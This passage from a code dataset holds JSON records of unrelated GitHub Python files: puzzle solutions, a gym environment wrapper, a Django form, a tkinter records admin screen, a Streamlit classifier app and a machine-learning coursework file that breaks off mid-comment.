to_play)\r\n\r\n return res\r\n\r\nif __name__ == \"__main__\":\r\n f = open(\"./input.txt\", \"r\")\r\n input = f.read().splitlines()\r\n player_1_pos = int(input[0][-1])\r\n player_2_pos = int(input[1][-1])\r\n\r\n print(max(calculate_num_wins(player_positions=json.dumps([player_1_pos, player_2_pos]), player_scores=json.dumps([0, 0]), to_play=0)))\r\n","repo_name":"mattwedge/AdventOfCode","sub_path":"2021/day21/part2.py","file_name":"part2.py","file_ext":"py","file_size_in_byte":1432,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"11617968253","text":"N, M = map(int, input().split())\r\n\r\nS = []\r\nfor i in range(M):\r\n A = list(map(int, input().split()))\r\n S.append(set(A[1:]))\r\n\r\nused = set()\r\nstack = []\r\nans = int(1e9)\r\ndef BT():\r\n global ans\r\n global used\r\n\r\n if len(used) == N:\r\n ans = min(ans, len(stack))\r\n return\r\n\r\n if len(stack) > 0:\r\n s = stack[-1] + 1\r\n else:\r\n s = 0\r\n\r\n for i in range(s, M):\r\n stack.append(i)\r\n used = used.union(S[i])\r\n BT()\r\n stack.pop()\r\n used = set()\r\n for j in stack:\r\n used = used.union(S[j])\r\nBT()\r\nif ans == int(1e9):\r\n print(-1)\r\nelse:\r\n print(ans)","repo_name":"KongUm/BOJ","sub_path":"백준/Gold/11578. 팀원 모집/팀원 모집.py","file_name":"팀원 모집.py","file_ext":"py","file_size_in_byte":645,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"41277354267","text":"import gym\nfrom gym import spaces\n\nfrom minatar import Environment\n\n\nclass BaseEnv(gym.Env):\n metadata = {'render.modes': ['human', 'rgb_array']}\n\n def __init__(self, game, display_time=50, use_minimal_action_set=False, **kwargs):\n self.game_name = game\n self.display_time = display_time\n self.game_kwargs = kwargs\n self.game = Environment(env_name=self.game_name, **kwargs)\n if use_minimal_action_set:\n self.action_set = self.game.minimal_action_set()\n else:\n self.action_set = list(range(self.game.num_actions()))\n self.action_space = spaces.Discrete(len(self.action_set))\n self.observation_space = spaces.Box(0.0, 1.0, shape=self.game.state_shape(), dtype=bool)\n\n def step(self, action):\n action = self.action_set[action]\n reward, done = self.game.act(action)\n return (self.game.state(), reward, done, {})\n \n def reset(self):\n self.game.reset()\n return self.game.state()\n \n def seed(self, seed=None):\n self.game = Environment(\n env_name=self.game_name,\n random_seed=seed,\n **self.game_kwargs\n )\n return seed\n\n def render(self, mode='human'):\n if mode == 'rgb_array':\n return self.game.state()\n elif mode == 'human':\n self.game.display_state(self.display_time)\n\n def close(self):\n if self.game.visualized:\n self.game.close_display()\n return 0","repo_name":"qlan3/gym-games","sub_path":"gym_minatar/envs/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":1355,"program_lang":"python","lang":"en","doc_type":"code","stars":63,"dataset":"github-code","pt":"37"} +{"seq_id":"17786668338","text":"from django import forms\n\nfrom aida.models.activity.workout import Workout\n\n\nclass WorkoutForm(forms.ModelForm):\n engaged_at = forms.DateTimeField(input_formats=[\"%Y-%m-%d %H:%M\"],\n widget=forms.DateTimeInput(format=\"%Y-%m-%d %H:%M\"))\n\n class Meta:\n model = Workout\n fields = (\"type\", \"engaged_at\")\n labels = {\n \"type\": \"Workout Type\",\n }\n\n def __init__(self, *args, **kwargs) -> None:\n super(WorkoutForm, self).__init__(*args, **kwargs)\n for key, field in self.fields.items():\n field.widget.attrs.update({\"class\": \"form-control\"})\n","repo_name":"neurothrone/project-aida","sub_path":"aida/forms/activity/workout.py","file_name":"workout.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"10741243449","text":"\"\"\"\n287.寻找重复数\n给定一个包含n + 1 个整数的数组nums ,其数字都在 1 到 n之间(包括 1 和 n),可知至少存在一个重复的整数。\n\n假设 nums 只有 一个重复的整数 ,找出 这个重复的数 。\n\n示例 1:\n输入:nums = [1,3,4,2,2]\n输出:2\n\n示例 2:\n输入:nums = [3,1,3,4,2]\n输出:3\n\n示例 3:\n输入:nums = [1,1]\n输出:1\n\n示例 4:\n输入:nums = [1,1,2]\n输出:1\n\n提示:\n2 <= n <= 3 * 104\nnums.length == n + 1\n1 <= nums[i] <= n\nnums 中 只有一个整数 出现 两次或多次 ,其余整数均只出现 一次\n\n进阶:\n如何证明 nums 中至少存在一个重复的数字?\n你可以在不修改数组 nums 的情况下解决这个问题吗?\n你可以只用常量级 O(1) 的额外空间解决这个问题吗?\n你可以设计一个时间复杂度小于 O(n2) 的解决方案吗?\n\n来源:力扣(LeetCode)\n链接:https://leetcode-cn.com/problems/find-the-duplicate-number\n著作权归领扣网络所有。商业转载请联系官方授权,非商业转载请注明出处。\n\"\"\"\nfrom typing import List\n\n\nclass Solution:\n def findDuplicate(self, nums: List[int]) -> int:\n slow, fast = 0, 0\n while True:\n slow = nums[slow]\n fast = nums[nums[fast]]\n if slow == fast:\n break\n root = 0\n while root != slow:\n root = nums[root]\n slow = nums[slow]\n return slow\n","repo_name":"GeorgeDaiz/my_python","sub_path":"Leetcode/Array-Str/287.find-the-duplicate-number.py","file_name":"287.find-the-duplicate-number.py","file_ext":"py","file_size_in_byte":1463,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70717848108","text":"# -*- coding: utf-8 -*-\n__author__ = 'Liu'\n\n\n# script, in_file, out_file = argv\n# 通过输入等方式传入文件名字\nin_file = input(\"input>\")\nout_file = input(\"output>\")\n\n\ndef copy(*args):\n # 把传入的名字分配给input和output\n input, output = args\n in_file = open(input)\n indata = in_file.read()\n out_file = open(output, 'w')\n out_file.write(indata)\n\n\ncopy(in_file, out_file)","repo_name":"Lxxyx/Learn-python-the-hard-way","sub_path":"上半部分/Day20 函数和文件/Day20 Test.py","file_name":"Day20 Test.py","file_ext":"py","file_size_in_byte":407,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1785305559","text":"#\n# Template for code submission\n#\n# name :Davyd\n# email :dab254@pitt.edu\n# date :27.10.2016\n# class :CS0008-f2016\n# instructor : Max Novelli (man8@pitt.edu)\n#\n# Description:\n# The code for Assignment 2\n#\n# Notes:\n# Help, I need somebody Help, not just anybody\n#\n# START OF THE PROGRAMME AND ITS COMMENTARIES!!!\n#\n# Function(or Method as it doesn't return any value back) #1:\n# Making function for printKV\ndef printKV(key, value, klen = 0):\n # Finding the total key length\n kl = len(key)\n space = klen\n # Getting maximum space\n if (kl>klen):\n space = kl\n #Checking if value is an int\n if (isinstance(value, int)):\n # Printing int value and our pre-made string\n print('%-20s: %-10d' % (key, value))\n # Otherwise\n else:\n # Printing float number and our pre-made string\n print('%-20s: %-10.3f' % (key, value))\n#\n# Function #2:\n# Reading from file FO\ndef processFile(FO):\n # Total number of lines counter\n line_count = 0\n # Total distance run counter\n sum_total = 0\n # Opening file\n fp = open(FO, 'r')\n # For all lines in FO\n for line in fp:\n # Increasing line count\n line_count += 1\n # Removing '\\n'(new line) from the end of each line\n line = line.rstrip()\n # Splitting string and float to create a list\n st = line.split(',')\n # Finding sum_total\n sum_total += float(st[1])\n # returning data\n return line_count, sum_total\n#\n# Total sum (number of lines) of all files\nwhole_line = 0\n# Total sum (distance run) of all files\nwhole_sum = 0\n#\n# Making infinite loop (as we don't know the number of files which user will put in the programme)\nwhile(True):\n # Making a void line for beautification sake\n print(' ')\n # Getting file name (remember that files should be in repository in order for them to be used):\n FO = input('Please, enter file to be read:')\n # Checking if user wants to quit, as we don't know how many files was used\n if ((FO=='quit') or (FO=='q')):\n # Ending the infinite loop\n break\n # Processing the file:\n line_count, sum_total = processFile(FO)\n # Printing partial total sum of lines and partial distance run\n printKV('Partial Total # of lines', line_count)\n printKV('Partial distance run', sum_total)\n whole_line += line_count\n whole_sum += sum_total\n#\n# Making a void line for beautification sake\nprint(' ')\n# Printing total sum of lines and total distance run\nprint('Totals:')\nprintKV('Total # of lines', whole_line)\nprintKV('Total distance run', whole_sum)\n","repo_name":"Seargent/CS0008-f2016","sub_path":"f2016_cs8_dab254_a2/f2016_cs8_dab254_a2.py","file_name":"f2016_cs8_dab254_a2.py","file_ext":"py","file_size_in_byte":2577,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"13926044740","text":"def dfs(s, g):\n stack = [] # 빈 리스트 스택 만들기\n visited = [False] * (V+1) # 방문검사\n stack.append(s) # 스택에 시작점을 넣는다.\n\n # 스택이 전부 비워질때까지 반복문 돌리기\n while stack:\n # 스택에서 꺼내서 현재 값에 할당\n cur = stack.pop()\n # 현재 값 방문표시 해주기\n visited[cur] = True\n # 현재 값에 인접한 근처 간선을 살펴보기\n for w in range(1, V+1):\n # 방문은 하지 않았는데 인접하다면\n if not visited[w] and arr[cur][w]:\n # 갈 수 있으므로 스택에 push\n stack.append(w)\n # 돌다가 끝점에 도착\n if visited[g]:\n # 1 반환\n return 1\n else:\n return 0\n\nT = int(input())\n\nfor tc in range(1, 1+T):\n V, E = map(int, input().split())\n arr = [[0] * (V + 1) for _ in range(V + 1)]\n\n for i in range(E):\n start, end = map(int, input().split())\n arr[start][end] = 1\n\n s, g = map(int, input().split())\n\n print(f'#{tc} {dfs(s, g)}')\n","repo_name":"seongbiny/algorithm","sub_path":"SWEA/4871_1.py","file_name":"4871_1.py","file_ext":"py","file_size_in_byte":1099,"program_lang":"python","lang":"ko","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"43364180852","text":"import pixelhouse as ph\nimport numpy as np\nimport h5py\nimport os\nimport cv2\n\n# Light phantom, 20x on 0.1 gaussian blur, ~mask, MIXED_CLONE\n#f_image = \"data/source_images/obama-600x587.jpg\"\n#mask_dir = 'data/masks'\n\n#f_image = \"data/source_images/John_Cena_2012.jpg\"\n#f_image = \"data/source_images/emilia-clarke-no-makeup-blonde-brown-ftr.jpg\"\n\n#f_image = 'movies/000587.jpg'\nf_image = 'movies/000750.jpg'\nmask_dir = 'data/movie_mask/'\n\n\nf_h5 = os.path.join(mask_dir, os.path.basename(f_image))+'.h5'\n\nmask = None\nwith h5py.File(f_h5) as h5:\n for key in h5:\n if h5[key].attrs['label'] != 'person':\n continue\n\n #if h5[key].attrs['label'] == 'person':\n # continue\n\n if mask is None:\n mask = h5[key]['mask'][...]\n else:\n mask += h5[key]['mask'][...]\n\nC = ph.load(f_image)\nprint(C.shape, C.img.shape)\n\n\ndef pastebox(canvas, img, fmask, location):\n mask = np.zeros((*canvas.img.shape[:2], 3), canvas.img.dtype)\n mask[fmask] = [255]*3\n \n #mask[:,:] = [255,255,255]\n #canvas.img[fmask] = 0\n #print(loc)\n #print(canvas.shape)\n #canvas.show()\n #exit()\n\n print(mask.shape, canvas.img.shape, img.shape)\n\n canvas.img[:, :, :3] = cv2.seamlessClone(\n img[:, :, :3], canvas.img[:, :, :3], mask, tuple(location),\n #cv2.NORMAL_CLONE\n cv2.MIXED_CLONE\n #cv2.MONOCHROME_TRANSFER\n )\n\n\n#C.img[mask] = 155\n#C.show()\n#exit()\n\n\n\n#loc = C.shape[1]//2, C.shape[0]//2\nloc = C.shape[1]//2, C.shape[0]//2\n#mask[0,0] = True\n#mask[0,-1] = True\n#mask[-1,0] = True\n#mask[-1,-1] = True\n\nC.show()\norg = C.copy()\n\nfor i in range(2000):\n print(i)\n C2 = C.copy()\n C2 += ph.filters.gaussian_blur(0.1,0.1)\n\n #pastebox(C, C2.img, mask, loc)\n pastebox(C, C2.img, ~mask, loc)\n \n C.show()\n","repo_name":"thoppe/greasepaint","sub_path":"P4_mess_with_background.py","file_name":"P4_mess_with_background.py","file_ext":"py","file_size_in_byte":1802,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"35035653023","text":"import tkinter.font as tkFont\r\nfrom tkinter import *\r\nfrom PIL import Image, ImageTk\r\nimport os\r\nimport sqlite3\r\nimport datetime\r\nfrom del_user import test3\r\nfrom choose_user import *\r\nfrom add_user import test5\r\nimport re\r\nfrom time import sleep\r\n\r\nimport tkinter.messagebox\r\nconnection = sqlite3.connect('NCD.db')\r\ncursor = connection.cursor()\r\n\r\n\r\ndef system_home(k):\r\n photoPath=''\r\n t2 = Tk()\r\n t2.configure(background='white')\r\n \r\n w, h = t2.winfo_screenwidth(), t2.winfo_screenheight()\r\n t2.geometry(\"%dx%d+0+0\" % (w, h))\r\n\r\n def add_user():\r\n t2.destroy()\r\n test5(k)\r\n\r\n def update_user():\r\n t2.destroy()\r\n test4(k)\r\n\r\n def delete_user():\r\n t2.destroy()\r\n test3(k)\r\n\r\n def logout():\r\n os.remove('sys'+pol_id+'.jpg')\r\n t2.destroy()\r\n b = str(datetime.datetime.now())\r\n cursor.execute(\"UPDATE POLICE set LASTLOGIN=? where POLICEID=?\", (b, k,))\r\n connection.commit()\r\n import subprocess\r\n subprocess.call(\"python login_page_first.py\")\r\n \r\n def last():\r\n q = cursor.execute(\"SELECT * FROM POLICE where POLICEID=?\", (k,))\r\n u = q.fetchall()\r\n s = u[0][6].split()\r\n tkinter.messagebox.showinfo('Last Login Details','Welcome ' + u[0][2] + '\\nLast Login Date: ' + s[0] + '\\nLast Login Time: ' + s[1])\r\n\r\n fil = tkFont.Font(family=\"Times New Roman\", size=22)\r\n v = StringVar(t2)\r\n\r\n name=Label(t2, text=\"S Y S T E M A D M I N I S T R A T O R\", fg='grey',font=tkFont.Font(family=\"Times New Roman\", size=40), borderwidth=2, relief=\"solid\")\r\n name.place(x=0, y=30, width=w, height=100)\r\n\r\n user_detail_1 = Label(t2, text='Name', font=tkFont.Font(family=\"Times New Roman\", size=18), borderwidth=2,relief=\"solid\")\r\n user_detail_2 = Label(t2, text='Police ID', font=tkFont.Font(family=\"Times New Roman\", size=18), borderwidth=2,relief=\"solid\")\r\n user_detail_3 = Label(t2, text='Date of Birth', font=tkFont.Font(family=\"Times New Roman\", size=18),borderwidth=2, relief=\"solid\")\r\n user_detail_4 = Label(t2, text='Email ID', font=tkFont.Font(family=\"Times New Roman\", size=18), borderwidth=2,relief=\"solid\")\r\n user_detail_1.place(x=825, y=470, width=200, height=50)\r\n user_detail_2.place(x=825, y=540, width=200, height=50)\r\n user_detail_3.place(x=825, y=610, width=200, height=50)\r\n user_detail_4.place(x=825, y=680, width=200, height=50)\r\n\r\n v = StringVar(t2)\r\n add_user = Button(t2, text='ADD USER',font=fil, command=add_user, relief=\"raised\")\r\n update_user = Button(t2, text='EDIT USER',font=fil, command=update_user, relief=\"raised\")\r\n delete_user = Button(t2, text='DELETE USER',font=fil, command=delete_user, relief=\"raised\")\r\n logout_user = Button(t2, text='LOGOUT',font=fil, command=logout, relief=\"raised\")\r\n last_button = Button(t2, text='LAST LOGIN',font=fil, command=last, relief=\"raised\")\r\n \r\n x=cursor.execute(\"SELECT * FROM POLICE where POLICEID=?\", (k,))\r\n y=cursor.fetchall()\r\n\r\n for row in y:\r\n pol_id = row[0]\r\n photo = row[5]\r\n photoPath = \"sys\" + pol_id + \".jpg\"\r\n with open(photoPath, 'wb') as file:\r\n file.write(photo)\r\n\r\n t2.load11 = Image.open(photoPath)\r\n t2.load11 = t2.load11.resize((250, 250), Image.ANTIALIAS)\r\n t2.photo11 = ImageTk.PhotoImage(t2.load11, master=t2)\r\n t2.img11 = Label(t2, image=t2.photo11,borderwidth=2, relief=\"solid\")\r\n t2.img11.image = t2.photo11\r\n t2.img11.place(x=1025, y=190, width=250, height=250)\r\n\r\n add_user.place(x=170, y=200, width=400, height=80)\r\n delete_user.place(x=170, y=310, width=400, height=80)\r\n update_user.place(x=170, y=420, width=400, height=80)\r\n last_button.place(x=170, y=530, width=400, height=80)\r\n logout_user.place(x=170, y=640, width=400, height=80)\r\n\r\n cursor.execute(\"SELECT * FROM POLICE where POLICEID=?\", (k,))\r\n for row in cursor.fetchall():\r\n l_name = Label(t2, text=row[2].upper() + ' ' + row[3].upper() + ' ' + row[4].upper(), anchor='w', font=tkFont.Font(family=\"Times New Roman\", size=18), borderwidth=2, relief=\"solid\")\r\n l_police_id = Label(t2, text=row[0], font=tkFont.Font(family=\"Times New Roman\", size=18), anchor='w', borderwidth=2,relief=\"solid\")\r\n l_dob = Label(t2, text=row[11], font=tkFont.Font(family=\"Times New Roman\", size=18), anchor='w', borderwidth=2,relief=\"solid\")\r\n l_email_id = Label(t2, text=row[7], font=tkFont.Font(family=\"Times New Roman\", size=18), anchor='w', borderwidth=2,relief=\"solid\")\r\n l_name.place(x=1050, y=470, width=400, height=50)\r\n l_police_id.place(x=1050, y=540, width=400, height=50)\r\n l_dob.place(x=1050, y=610, width=400, height=50)\r\n l_email_id.place(x=1050, y=680, width=400, height=50)\r\n t2.title('System Administrator - '+row[2] + ' ' + row[3]+ ' ' + row[4])\r\n\r\n mainloop()","repo_name":"rajpbora/Centralised-Criminal-Records-Management-System","sub_path":"sys_home.py","file_name":"sys_home.py","file_ext":"py","file_size_in_byte":4848,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"7781232078","text":"# pip install streamlit\n# pip install numpy\n# pip install joblib\n# pip install openpyxl\n\n\n\n# from tkinter import X\nimport streamlit as st\nimport pandas as pd\nimport os\nimport pandas as pd\nimport MC_status\nimport MC_Graph\nimport model_predict\nimport glob\nimport openpyxl \nimport csv\n# from streamlitapp.Data_Input import data_input\n\n\ndef get_csv(df):\n \n csv = df.to_csv(index=False)\n \n return csv\ndef get_data1(dtfile):\n dtfile.to_csv (r'../Temp/temp.csv', index = False, header=True)\n\ndef form_callback():\n st.write(st.session_state.my_option)\n st.write(st.session_state.my_checkbox)\n\ndef listmodel(path):\n return os.listdir(path)\n\ndef listmachine(path):\n return os.listdir(path)\n\n\ndef st_header(data):\n st.title(\"Switch Gear Status Classification App\")\n \n with st.container():\n \n col1, col2, col3 = st.columns([1,10,1])\n \n with col2 :\n # st.markdown(\"{}\".format(str(word)))\n uploaded_file = st.file_uploader(\"Choose a A1-A16 file\")\n \n # st.markdown(\"{}\".format(str(word)))\n uploaded_file2 = st.file_uploader(\"Choose a A18-A31 file\")\n \n if uploaded_file is not None and uploaded_file2 is not None:\n import data_split\n data_split.Data_Split.split(uploaded_file)\n data_split.Data_Split.split(uploaded_file2)\n data = True\n \n # st.write(data.head())\n \n # get_data1(data)\n # st.table(data)\n # import Data_split\n # Data_split.data_input(data)\n return data\n\n\n\ndef st_body():\n lstmodel = listmodel(\"../model/\")\n \n tmp = [i.split('.')[0] for i in lstmodel]\n col1, col2, col3 = st.columns([1,10,1])\n with col2 :\n with st.form(key='my_form'):\n option = st.selectbox('Select Model:',tmp,key=\"my_option\")\n submitted = st.form_submit_button('selected model and predict')\n if submitted:\n st.write('You selected model: {}'.format(str(option)))\n return lstmodel[tmp.index(option)]\n \n\ndef st_result(clf):\n df = None\n if clf is not None:\n model_predict.get_predict_result.getResult(clf)\n # model = joblib.load(os.path.join(\"../model/\",clf))\n # z = model.predict(X)\n # res = pd.concat([data,pd.DataFrame(z,columns=['Status'])],axis=1)\n # col1, col2, col3 = st.columns([1,1,1])\n # with col2 :\n # st.download_button(\"Download Classification File\",get_csv(res),\"../output/result_app.csv\")\ndef download_results():\n \n files = [os.path.split(filename) for filename in glob.glob(\"../output/Predicted Results/*.csv\")]\n\n wb = openpyxl.Workbook()\n del wb[wb.sheetnames[0]] # Remove the default 'Sheet1'\n\n for f_path, f_name in files:\n (f_short_name, f_extension) = os.path.splitext(f_name)\n with open(os.path.join(f_path, f_name)) as f_input:\n ws = wb.create_sheet(title=os.path.basename(f_short_name))\n \n for row in csv.reader(f_input):\n ws.append(row)\n \n wb.save('../output/Predicted Results/Results.xlsx')\n\n with open('../output/Predicted Results/Results.xlsx', 'rb') as my_file:\n st.download_button(label = 'Download Results', data = my_file, file_name = 'Results.xlsx', mime = 'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet') \n\n\ndef status_body():\n status = MC_status.MC_status.st_status()\n return status\n\ndef summary_chart():\n st.header(\"Summary Chart\")\n chart_data = pd.DataFrame(\n MC_status.MC_status.sum_status(),\n columns=['Summary'],\n index=['Stage A', 'Stage B', 'Stage C','Stage D'])\n st.bar_chart(chart_data)\n\ndef history_chart():\n MC_Graph.mc_graph.get_mc_graph()\n\ndef main():\n with st.sidebar: \n data = None\n data = st_header(data)\n clf = st_body()\n if clf is not None and data is True:\n st_result(clf)\n download_results()\n else:\n st.write('Please upload files and select predection model!')\n \n \n \n\n tab1, tab2 = st.tabs([\"Summary\", \"Details\"])\n with tab1:\n st.header(\"Summary\")\n status_body() \n summary_chart()\n with tab2:\n history_chart()\n \n\nmain()","repo_name":"mullermu/SWG-APP-Heroku","sub_path":"20221115_SWG Final/streamlitapp/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4445,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"12898575026","text":"from pathlib import Path\nfrom typing import List, Dict\nimport pandas as pd\nimport numpy as np\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn.tree import DecisionTreeClassifier\n\nfrom assignments.assignment1.a_load_file import read_dataset\nfrom assignments.assignment1.b_data_profile import get_column_mean\nfrom assignments.assignment1.c_data_cleaning import fix_nans\nfrom assignments.assignment1.d_data_encoding import generate_label_encoder, replace_with_label_encoder, \\\n generate_one_hot_encoder, replace_with_one_hot_encoder, fix_outliers, fix_nans, normalize_column\nfrom assignments.assignment1.e_experimentation import process_iris_dataset, process_amazon_video_game_dataset_again, \\\n process_life_expectancy_dataset\n\n\"\"\"\nClassification is a supervised form of machine learning. It uses labeled data, which is data with an expected\nresult available, and uses it to train a machine learning model to predict the said result. Classification\nfocuses in results of the categorical type.\n\"\"\"\n\n'''\nNOTE: I added some print statements to help looking at the functions output for texting\nI commented them out as they cause quite a lot of clutter while using them for larger functions\nBUT feel free to comment any of the print statements back in while testing if it helps :)\n'''\n\n\n##############################################\n# Example(s). Read the comments in the following method(s)\n##############################################\ndef simple_random_forest_classifier(X: pd.DataFrame, y: pd.Series, set: str = None) -> Dict:\n \"\"\"\n Simple method to create and train a random forest classifier\n https://scikit-learn.org/stable/modules/generated/sklearn.ensemble.RandomForestClassifier.html\n \"\"\"\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.30)\n\n # If necessary, change the n_estimators, max_depth and max_leaf_nodes in the below method to accelerate the model training,\n # but don't forget to comment why you did and any consequences of setting them!\n if set == 'Amazon':\n model = RandomForestClassifier(n_estimators=5)\n else:\n model = RandomForestClassifier()\n model.fit(X_train, y_train)\n y_predict = model.predict(X_test) # Use this line to get the prediction from the model\n accuracy = model.score(X_test, y_test)\n return dict(model=model, accuracy=accuracy, test_prediction=y_predict)\n\n\ndef simple_random_forest_on_iris() -> Dict:\n \"\"\"\n Here I will run a classification on the iris dataset with random forest\n \"\"\"\n df = pd.read_csv(Path('..', '..', 'iris.csv'))\n X, y = df.iloc[:, :4], df.iloc[:, 4]\n le = LabelEncoder()\n y_encoded = le.fit_transform(y)\n rf = simple_random_forest_classifier(X, y_encoded)\n\n print(rf['accuracy'])\n return rf\n\n\ndef reusing_code_random_forest_on_iris() -> Dict:\n \"\"\"\n Again I will run a classification on the iris dataset, but reusing\n the existing code from assignment1. Use this to check how different the results are (score and\n predictions).\n \"\"\"\n df = read_dataset(Path('..', '..', 'iris.csv'))\n for c in list(df.columns):\n # Notice that I am now passing though all columns.\n # If your code does not handle normalizing categorical columns, do so now (just return the unchanged column)\n df = fix_outliers(df, c)\n df = fix_nans(df, c)\n df[c] = normalize_column(df[c])\n\n X, y = df.iloc[:, :4], df.iloc[:, 4]\n le = generate_label_encoder(y)\n\n # Be careful to return a copy of the input with the changes, instead of changing inplace the inputs here!\n y_encoded = replace_with_label_encoder(y.to_frame(), column='species', le=le)\n rf = simple_random_forest_classifier(X, y_encoded['species'])\n\n '''\n !!Explanation!!\n Both the classifier in this function and the one in the last yield just about the same score on average\n I believe this is because the two datasets are essentially the same at this point:\n They both have label encoded classes\n The only difference is this function removed nans and outliers, which the dataset does not possess many of anyway\n And also normalizes the dataset, which from what my understanding might not actually change the values \n in relation to other values. This normalization may just make the model in this function more efficient!\n Due to this potential boost in efficiency due to normalization, I would choose this function's model over the last \n '''\n print(rf['accuracy'])\n return rf\n\n\n##############################################\n# Implement all the below methods\n# Don't install any other python package other than provided by python or in requirements.txt\n##############################################\ndef random_forest_iris_dataset_again() -> Dict:\n \"\"\"\n Run the result of the process iris again task of e_experimentation and discuss (1 sentence)\n the differences from the above results. Use the same random forest method.\n Feel free to change your e_experimentation code (changes there will not be considered for grading\n purposes) to optimise the model (e.g. score, parameters, etc).\n \"\"\"\n\n df = process_iris_dataset()\n X, y = df.iloc[:, :5], df.iloc[:, 5:]\n rf = simple_random_forest_classifier(X, y)\n\n '''\n !!!Explanation!!!\n There are not too many differences present, as the datasets are the same.\n The datasets are quite balanced, and the train and test are properly split so we can rule out model \n over fitting for the most part.\n Although the labels are encoded in different ways, their meanings are not changed between models.\n The only notable difference is that the process_iris_dataset() classifier has a slightly lower score on average.\n I believe this is because the process_iris_dataset() has an additional numeric mean column. \n This may provide extra noise to the dataset, which results in the classifier being slightly worse!\n I think this adds noise as the mean of each column doesn't really provide any new information that may benefit\n this specific classification task.\n To combat this, I believe running some feature selection and decsriptive analysis on the dataset, and \n dropping a few of the less relevant columns may improve the model.\n A feature selection method that may prove useful here is the Pandas correlation function \"corr()\" - to find the \n strength of the correlation between each feature and the target label. \n '''\n print(rf['accuracy'])\n return rf\n\n\ndef decision_tree_classifier(X: pd.DataFrame, y: pd.Series) -> Dict:\n \"\"\"\n Reimplement the method \"simple_random_forest_classifier\" but using the technique we saw in class: decision trees\n (you can use sklearn to help you).\n Optional: also optimise the parameters of the model to maximise accuracy\n :param X: Input dataframe\n :param y: Label data\n :return: model, accuracy and prediction of the test set\n \"\"\"\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.30)\n # max_features = 1\n # max_depth = 2\n # max_leaf_nodes = 2\n model = DecisionTreeClassifier()\n model.fit(X_train, y_train)\n y_predict = model.predict(X_test) # Use this line to get the prediction from the model\n accuracy = model.score(X_test, y_test)\n return dict(model=model, accuracy=accuracy, test_prediction=y_predict)\n\n\ndef train_iris_dataset_again() -> Dict:\n \"\"\"\n Run the result of the iris dataset again task of e_experimentation using the\n decision_tree classifier AND random_forest classifier. Return the one with highest score.\n Discuss (1 sentence) what you found different between the two models and scores.\n Feel free to change your e_experimentation code (changes there will not be considered for grading\n purposes) to optimise the model (e.g. score, parameters, etc).\n \"\"\"\n df = process_iris_dataset()\n X, y = df.iloc[:, :5], df.iloc[:, 5:]\n\n rf = simple_random_forest_classifier(X, y)\n dt = decision_tree_classifier(X, y)\n print(rf)\n print(dt)\n '''\n !!!Explanation!!!\n I may be inclined to choose the decision tree here (in this specific case) over the random forest\n Though random forests are typically known to be more accurate, this is because they take the average of many\n decision trees, rather than just one. This makes the decision tree more efficient in time and space as it requires\n only one tree, instead of many.\n In this specific instance, it seems that on average the decision tree is just as accurate as the random forest\n I believe this is due to the data set being both balanced and easily separable.\n Therefore I will take the decision tree over the random forest, \n as the decision tree is yielding around the same accuracy on average, AND is more efficient.\n This is just for this specific function though, I think overall random forests are usually the way to go, \n even if they require more time and resources to execute; they do solve a lot of accuracy issues the decision\n trees may have, such as overfitting.\n '''\n if rf['accuracy'] > dt['accuracy']:\n print('random forest wins')\n return rf\n else:\n print('decision tree wins')\n return dt\n\n\ndef train_amazon_video_game_again() -> Dict:\n \"\"\"\n Run the result of the amazon dataset again task of e_experimentation using the\n decision tree classifier AND random_forest classifier. Return the one with highest score.\n The Label column is the user column. Choose what you wish to do with the time column (drop, convert, etc)\n Discuss (1 sentence) what you found different between the results.\n In one sentence, why is the score worse than the iris score (or why is it not worse) in your opinion?\n Feel free to change your e_experimentation code (changes there will not be considered for grading\n purposes) to optimise the model (e.g. score, parameters, etc).\n \"\"\"\n\n df = process_amazon_video_game_dataset_again()\n\n '''\n !!!Explanation!!!\n This is the most significant preprocess action I make\n I have decided to remove all rows that have labels that appear less than 10 times in the dataset\n I find this solves many of the issues I was having with this data set\n 1. In classification, the model must train itself using the available labels in the training set, and then tests its\n performance predicting those labels with the testing set. I found as there are many unique instances in this dataset\n the model would evaluate instances that had labels which the model had not even seen before. This is problematic as \n the model would essentially make a guess at the instance, and because it did not know the correct label, it would \n always get it wrong. To fix the data set, it may be good to collect some data to help inflate those unique instances\n and thus balancing the dataset, or to somehow generalize labels so they are not so specific to a point where there\n are single instances with a unique label.\n 2. This also significantly reduces the size of the data set, which allows the model to run efficiently without \n sacrifices to the Decision Tree or Random Forest models. The data set is reduced to nearly half of what it used to \n be when you remove unique instances, and even more when you only look at labels that appear at least 10 times.\n '''\n df = df.drop(df[df['user_count'] < 10].index)\n print(df)\n\n X, y = df.iloc[:, 1:], df.iloc[:, :1]\n\n '''\n !!!Explanation!!!\n I decided to drop the time column as I personally don't think it will have a correlation with the target labels.\n The time only seems to indicate the activity of the user, which is easily updates once the user reviews again.\n Thus, my theory is that the model might learn to check when a user is active, which could overfit the model if user\n activity is somewhat random.\n For example, if they reviewed a video game that came out today, after not reviewing one after 10 years,\n the model may not predict the user because it is biased to the activity dates.\n Sometimes sequels to games come out after a long, long time as any video game fan knows, and perhaps a player might\n want to review the newest sequel of a game series they used to like to review.\n I believe the model should be able to predict the user from other features relating to the users rating behaviours,\n but should be independent of time, as there are no set 